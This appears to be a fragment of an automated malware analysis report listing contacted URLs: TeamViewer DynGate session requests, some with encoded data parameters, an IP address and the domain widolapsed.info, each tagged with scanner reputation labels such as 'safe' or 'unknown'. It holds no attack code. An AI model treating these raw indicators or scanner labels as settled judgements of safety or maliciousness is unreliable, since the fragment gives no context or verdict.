      http://master13.teamviewer.com/din.aspx?s=42047152&client=DynGate&p=10000002 false
        		high
        http://master13.teamviewer.com/din.aspx?s=42047159&client=DynGate&p=10000002 false
          		high
          http://master13.teamviewer.com/dout.aspx?s=42047152&p=10000001&client=DynGate&data=FyQS8QAjHqmyuig6sTY0saWyvJMkoZ6YmBgcGRsZGpmckySiHpmcmJgam5oanBMmpKIemDwysbMaMTEcHLEZmRuvmRyamxocGBsZGxMrHpialxgXGxwbkCipkyE0tzC5PJ6DAQAAAFIAACkpoJiAAgAACIAAAH7LQs0qhaWs0MJjaOW1RZp/s+y/yn5XEbeVZg9sKBJ5zPw4VSW4zdwQ3dPOJPU35FNkIfcILZEzewXzbzR9HNSPt0dvZIMvjxebsFa8mt4yIfhUHNJCrU/eCKZvCgbkPO7XECRgFWPWpqy/DxavH2VA1uMNeC6MgWi1tqYJlUpU false
            		high
            http://188.172.235.146/din.aspx?s=12251267&m=fast&client=DynGate&p=10000002 false
            • Avira URL Cloud: safe
            		 unknown
            http://master13.teamviewer.com/dout.aspx?s=42047224&p=10000001&client=DynGate&data=FyQS6wChtjSytzoeqisoqZMjHqY3s7S3EyOrnpgTI6umMrsyth6aGBgTJDSyMqe3NjS3Mqm6MLo6uZ6YEyQqKignqqoemRMkoZ6YmBgcGRsZGpmckySiHpmcmJgam5oanBMlsrK4MLY0uzKemJMmMLczurCzsp61MJMmNLGytzmyqjy4Mp6YEyakoh6YPDKxsxoxMRwcsRmZG6+ZHJqbGhwYGxkbEyc3p7Mgsbo0uzKlsrK4MLY0uzKemBMpOrc6NLaynpqTKbq4ODe5OjKyIzKwujq5MrmemJMqIagnqqoemBMrHpialxgXGxwbkCip false
              		high
              http://master13.teamviewer.com/dout.aspx?s=42047159&p=10000001&client=DynGate&data=FyQS9ACjHqmyuim0s7cwujq5MqWyvJMkoZ6YmBgcGRsZGpmckySiHpmcmJgam5oanBMmpKIemDwysbMaMTEcHLEZmRuvmRyamxocGBsZGxMrHpialxgXGxwbkCipkyE0tzC5PJ6DAQAAABIAACkpoJiAAgAACIAAABKJHDw2LgVxSDgQRZJcruSvmCif9Gt2TW3hKr1gLfUfE+41DTTEIjH9R8iP3LoBGOJ+mtJU9XCLVeH0PEI9syAw5y9+liHYCQSiHVEX/VS+caNKAiNEKBpchOIJAAICwW843p+TOKZHDFo8qX87SA1CKgBTr4AFtosrqQ/gO/pU false
                		high
                http://188.172.235.146/dout.aspx?s=12251267&p=10000001&client=DynGate false
                • Avira URL Cloud: safe
                		 unknown
                http://188.172.235.146/din.aspx?s=00000000&m=fast&client=DynGate&rnd=975066281&p=10000001 false
                • Avira URL Cloud: safe
                		 unknown
                http://188.172.235.146/dout.aspx?s=12251267&p=10000002&client=DynGate false
                • Avira URL Cloud: safe
                		 unknown
                http://master13.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=991669640&p=10000001 false
                  		high
                  http://master13.teamviewer.com/din.aspx?s=42047145&client=DynGate&p=10000002 false
                    		high
                    https://widolapsed.info/B8C631A8/ false
                    • Avira URL Cloud: safe
                    		 unknown
                    http://master13.teamviewer.com/din.aspx?s=42047224&client=DynGate&p=10000002 false
                      		high